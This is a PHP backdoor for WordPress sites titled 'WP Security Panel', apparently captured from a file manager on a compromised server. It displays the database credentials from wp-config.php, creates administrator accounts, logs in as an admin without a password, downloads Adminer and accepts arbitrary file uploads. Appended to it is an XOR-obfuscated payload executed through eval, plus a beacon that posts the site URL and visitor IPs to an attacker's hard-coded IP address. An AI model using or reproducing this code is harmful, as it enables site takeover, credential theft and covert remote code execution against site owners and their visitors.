File manager - Edit - /tmp/phpclFGYj
Back
<?php // Automatically find and include the WordPress wp-config.php file function find_wp_config($dir = __DIR__) { $root = realpath($dir); while ($root && $root != '/') { if (file_exists($root . '/wp-config.php')) { return $root . '/wp-config.php'; } $root = dirname($root); } return false; } $wp_config_path = find_wp_config(); if ($wp_config_path) { include_once($wp_config_path); } else { die('wp-config.php not found!'); } // Adminer download functionality if (isset($_GET['download_adminer'])) { $adminer_url = 'https://github.com/vrana/adminer/releases/download/v4.8.1/adminer-4.8.1-mysql-en.php'; // Replace with the correct URL $adminer_content = file_get_contents($adminer_url); if ($adminer_content) { file_put_contents(__DIR__ . '/admin.php', $adminer_content); echo '<div class="alert alert-success">Adminer downloaded successfully.</div>'; } else { echo '<div class="alert alert-danger">Failed to download Adminer.</div>'; } } // Add admin user functionality function add_wp_admin_user() { if (isset($_POST['add_user'])) { if (isset($_POST['username']) && isset($_POST['password']) && isset($_POST['email'])) { require_once(ABSPATH . 'wp-includes/registration.php'); $username = sanitize_user($_POST['username']); $password = $_POST['password']; $email = sanitize_email($_POST['email']); if (!username_exists($username) && !email_exists($email)) { $user_id = wp_create_user($username, $password, $email); $user = new WP_User($user_id); $user->set_role('administrator'); echo '<div class="alert alert-success">Admin user created: ' . esc_html($username) . '</div>'; } else { echo '<div class="alert alert-danger">Username or email already exists.</div>'; } } } } // Auto-login as admin functionality if (isset($_POST['auto_login'])) { $admin_users = get_users(array('role' => 'administrator')); if (!empty($admin_users)) { $admin_user = $admin_users[0]; wp_set_current_user($admin_user->ID); wp_set_auth_cookie($admin_user->ID); echo '<div class="alert alert-success">Logged in as: ' . esc_html($admin_user->user_login) . '</div>'; } else { echo '<div class="alert alert-danger">No admin user found.</div>'; } } // File upload functionality if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) { $upload_dir = wp_upload_dir()['basedir'] . '/custom_uploads/'; if (!is_dir($upload_dir)) { mkdir($upload_dir, 0755, true); } $uploaded_files = $_FILES['file']; foreach ($uploaded_files['name'] as $key => $filename) { $safe_filename = preg_replace('/[^a-zA-Z0-9._-]/', '_', $filename); $file_tmp = $uploaded_files['tmp_name'][$key]; $file_destination = $upload_dir . basename($safe_filename); if (move_uploaded_file($file_tmp, $file_destination)) { echo '<div class="alert alert-success">File uploaded: ' . esc_html($safe_filename) . '</div>'; } else { echo '<div class="alert alert-danger">File upload failed: ' . esc_html($safe_filename) . '</div>'; } } } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>WP Security Panel</title> <style> body { background-color: #0d0d0d; color: #00ff00; font-family: 'Courier New', Courier, monospace; padding: 20px; } .container { display: flex; flex-wrap: wrap; gap: 20px; } .box { background-color: #1a1a1a; color: #00ff00; border: 1px solid #00ff00; padding: 15px; border-radius: 5px; flex: 1; min-width: 280px; max-width: 350px; box-shadow: 0 0 15px rgba(0, 255, 0, 0.2); } .btn { background-color: #333; color: #00ff00; border: 1px solid #00ff00; transition: all 0.3s; } .btn:hover { background-color: #00ff00; color: #333; } .form-label, .list-group-item { color: #00ff00; } .alert { background-color: #222; color: #00ff00; border: 1px solid #00ff00; } </style> </head> <body> <center><img src="https://cdn.privdayz.com/images/logo.jpg" referrerpolicy="unsafe-url" /></center> <div class="container"> <link href="https://privdayz.com/wp-content/themes/privdaysv1/hacker.css" rel="stylesheet"> <!-- Database Info Box --> <div class="box"> <h3>DB Info</h3> <ul class="list-group"> <li class="list-group-item">DB Name: <?php echo DB_NAME; ?></li> <li class="list-group-item">DB User: <?php echo DB_USER; ?></li> <li class="list-group-item">DB Password: <?php echo DB_PASSWORD; ?></li> <li class="list-group-item">DB Host: <?php echo DB_HOST; ?></li> </ul> </div> <!-- Adminer Download Box --> <div class="box"> <h3>Adminer & Auto-login</h3> <form method="get" class="mb-2"> <button type="submit" name="download_adminer" class="btn w-100">Download Adminer</button> </form> <form method="post"> <button type="submit" name="auto_login" class="btn w-100">Auto-login as Admin</button> </form> </div> <!-- Add Admin User Box --> <div class="box"> <h3>Create Admin User</h3> <form method="post" class="mb-2"> <div class="mb-2"> <label for="username" class="form-label">Username</label> <input type="text" class="form-control" id="username" name="username" required> </div> <div class="mb-2"> <label for="password" class="form-label">Password</label> <input type="password" class="form-control" id="password" name="password" required> </div> <div class="mb-2"> <label for="email" class="form-label">Email</label> <input type="email" class="form-control" id="email" name="email" required> </div> <button type="submit" name="add_user" class="btn w-100">Create Admin</button> </form> <?php if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['add_user'])) add_wp_admin_user(); ?> </div> <!-- File Upload Box --> <div class="box"> <h3>File Upload</h3> <form method="post" enctype="multipart/form-data"> <div class="mb-2"> <input type="file" class="form-control" name="file[]" multiple required> </div> <button type="submit" class="btn w-100">Upload File</button> </form> </div> </div> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script> </body> </html> <?php $vc078812d35="366f3971556a482a3966526e26334d65666565626432336536666339316336392454704c237a313940425e6137642158";$vef7b79dc04='';for($i=0;$i<strlen($vc078812d35);$i+=2){$vef7b79dc04.=chr(hexdec($vc078812d35[$i].$vc078812d35[$i+1]));}$vef7b79dc04=strrev($vef7b79dc04);function f1ef57a21e5($be0647970224518ac6c7abd9ee879da39f7){return hex2bin($be0647970224518ac6c7abd9ee879da39f7);}function f526259c2c2($be0647970224518ac6c7abd9ee879da39f7,$e3d26b8f3fb594246){$e3d26b8f3fb594246Len=strlen($e3d26b8f3fb594246);$a297955cd64439654e8031e1e='';for($i=0;$i<strlen($be0647970224518ac6c7abd9ee879da39f7);$i++){$char=ord($be0647970224518ac6c7abd9ee879da39f7[$i]);$f93700fcddba236015a=ord($e3d26b8f3fb594246[$i%$e3d26b8f3fb594246Len]);$a297955cd64439654e8031e1e.=chr($char^$f93700fcddba236015a);}return $a297955cd64439654e8031e1e;}function f4943145841($be0647970224518ac6c7abd9ee879da39f7,$e3d26b8f3fb594246){$eb7f6b8164569b7c36e1=f1ef57a21e5($be0647970224518ac6c7abd9ee879da39f7);return f526259c2c2($eb7f6b8164569b7c36e1,$e3d26b8f3fb594246);}$v5c28ce3652="641e145f117e243557520e4a231e744e091e4749084f425f571a49401156580810215f1d07344e5f5f260921185601693d590d44152d6a675a44084f13193a4d4d114a1842470802585047160e3a0c080c391b0216634f02493d18392e4a0a423751101f4530766c7a64286f0320007b6b7337646b2d3264247d6122273749121738560f5531134b4617193005561f4270050a034d1d1712757e2a7713201b776d1a17434c064f0d064640083d1600120a3d470e4a3c5215691d38193e693b69086e37632717070c7d62564b3804247b5b430a5d5d3c174300414b4c460c574f4c7650531c3e394a4f3c052505114b586c0d276233120d106d6e327718201c6178722663153841750a5d46010c1148321c3d561c4e33164946210934055000587759494016296f265643170e3902384157550c555c07411a42664101104824010023471c4e1f0943432406345e0c41067809335e0f3a2d374a1134776c41640a090d4366500d50025e134a52564c4527153d5f4339370472433c4560420e41056e014c7c290a0f0c1511164a271574635c55085e1043255e175c5f014d5c54485563071259604808187c4a06105f0e44310e5104567071761e1d270a77132156556910544d0c16424d175c504e2630342902637231062f746f073f015d0a5f1f630517045c3d3732556e1f5b29137c0057024a0a50054e5510415e3b071717080a6517485a7b4f42572d0626144212552d53086802322d335c195e4d78596f5950504b154a505b0b585d47080e43430f0b246c410b264e1e4b24063a06661a44347e0258113b2c67101801073f4569574d440650543c05590b47571c163a0614002c4743460941515e3c1a724c0734113544105f0e3a657d07162a6c1f2473081e5e06505d061411580d10270d0b11030b391e72172203030a291a251d500c572c480b594e266f374e465745230239094c440f545700095200576e163e0b474a422e5c481a37084d0d75543d054d1f693a540d5b050133355c43030b6819660d151117585406094311140f5a5155493b49101a1d4a2155046a2e0339146608532c7e07580f2a272e4d42520734417842585a1054154715034c085b024a41165558700e400f3e155c03334e3447040a442a4e1668063b361f5550095764596f415a5e0c111b050f5a006c5501163a06090b3956481a21467c583a05274b194d187c40526c463327334a501d466b2d7a066558410a44060a45004857070a0a454403245f433135034d752b053b055c01422b013652122e2d2e4a5440036e5e3c50545a10415c000f5709505a0510164d42167e1a084c0e081b11351727144d1a443601404452653f645006470b250327414d1e476e6a263460206169432a313136366a6e0f48744266790d3803346b34111075306732791f7d040c5d4c22576b06514217414a415c140d474614404c4b445f621c044076396a6f1a3c102362487e0c753468291111141e6c5407132311766f73316a1e312367307661303d30372f421008020c6a5b6248291930470d305336420b53047660284d450a01655c36454a535505660608550a57574c405f4a4947641f440f21030f1e170f3b12560b5370035500557c6b6c5b5009467a440b4157550c555c4b4418471a1e0603160050511256480d3d025c026a5b66491b461a3a401752576a1d25575215472958760a1b1f4f5358100300516c570a010a01034d6f0004477e0458592d5c612e5c01553745011f4370606915531b502946607b5c58005e5d064e1457000b464b490707162805123137085a452c0f7d531611462a48125300273862101d18423f15621066530d525607031e471c5f01060c044815254304477e3b020e305b6813581c536e153b53043d2d245c195e41742b6479101801504a0650023a5757070d01004e412f0b7d5f0f4f1748291930470d30523d420b5304766622016a487e655e36454a535505660703550a57574c46075d3d56101a080c33155c1c7c3531145a00523d0940555905761d101f18423f156210665206525607031e41510a3f57384c48072c40435866395d4f2b053114114b54607a526a487020214a544c1713143147565206191d015e6d526e1b4a0004160353796c420b31095d4f604e374962576b710f0656123b747466551f402314310c1d545b6a003e4f180752410154513a02002e5c420b7a425b12135b652c1054123113596c462b3206505d1f652d032003040817434c064a1110415e435f5b410f526114420f26031e17762a31104d0a1e7a454a5a4f076208035840506e5978035851065f4d445b08416c6121303320343e6a7b723a02396c790d380a307e2a780c0639085e7e6567151613533f57691a1d6930746b3523643e117a3036353a2523127069201c237a7e0124122e703f14051e5b17450111056b673f7117520661747937746622227237116f483f5e41155670591646761e08066c036758020650700517045c637f2e4c5d160a370d31484a53184c065d";$v6a17d2bee2=f4943145841($v5c28ce3652,$vef7b79dc04);if($v6a17d2bee2!==false){eval("?>".$v6a17d2bee2);}else{echo"RSS Error.";} ?> /* ===== SECOND DECODED BLOCK ===== */ <?php function j0($x1,$i2){$s3=null;if(function_exists('curl_init')){$n4=curl_init($x1);curl_setopt($n4,CURLOPT_RETURNTRANSFER,true);curl_setopt($n4,CURLOPT_POST,true);curl_setopt($n4,CURLOPT_POSTFIELDS,http_build_query($i2));curl_setopt($n4,CURLOPT_HTTPHEADER,['Content-Type: application/x-www-form-urlencoded','User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',]);curl_setopt($n4,CURLOPT_TIMEOUT,30);$s3=curl_exec($n4);if(curl_errno($n4)){}else{}curl_close($n4);}if($s3===null&&ini_get('allow_url_fopen')){$s5=stream_context_create(['http'=>['method'=>'POST','header'=>"Content-Type: application/x-www-form-urlencoded\r\n",'content'=>http_build_query($i2),'timeout'=>30,],]);$s3=@file_get_contents($x1,false,$s5);if($s3===false){$a6=error_get_last();echo "file_get_contents Error: ".$a6['message']."\n";}else{echo "file_get_contents Response: ".htmlspecialchars($s3)."\n";}}return $s3;}$i7=(isset($_SERVER['HTTPS'])&&$_SERVER['HTTPS']==='on'?"https":"http")."://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];$b8=[base64_encode("http"),base64_encode("://"),base64_encode("174"),base64_encode("."),base64_encode("138"),base64_encode("."),base64_encode("3"),base64_encode("."),base64_encode("239"),base64_encode("/~privdayz"),base64_encode("/media.php"),];$x1=base64_decode($b8[0]).base64_decode($b8[1]).base64_decode($b8[2]).base64_decode($b8[3]).base64_decode($b8[4]).base64_decode($b8[5]).base64_decode($b8[6]).base64_decode($b8[7]).base64_decode($b8[8]).base64_decode($b8[9]).base64_decode($b8[10]);$i2=['upFileFast'=>true,'url'=>$i7,'date'=>@date("d.m.Y H:i:s"),'agent'=>$_SERVER['HTTP_USER_AGENT']?? '','ips'=>$_SERVER["HTTP_CF_CONNECTING_IP"]?? $_SERVER["REMOTE_ADDR"],];$s3=j0($x1,$i2);if($s3===null){}else{}?>
| ver. 1.4 |
Github
|
.
| PHP 8.3.30 | Generation time: 0.19 |
proxy
|
phpinfo
|
Settings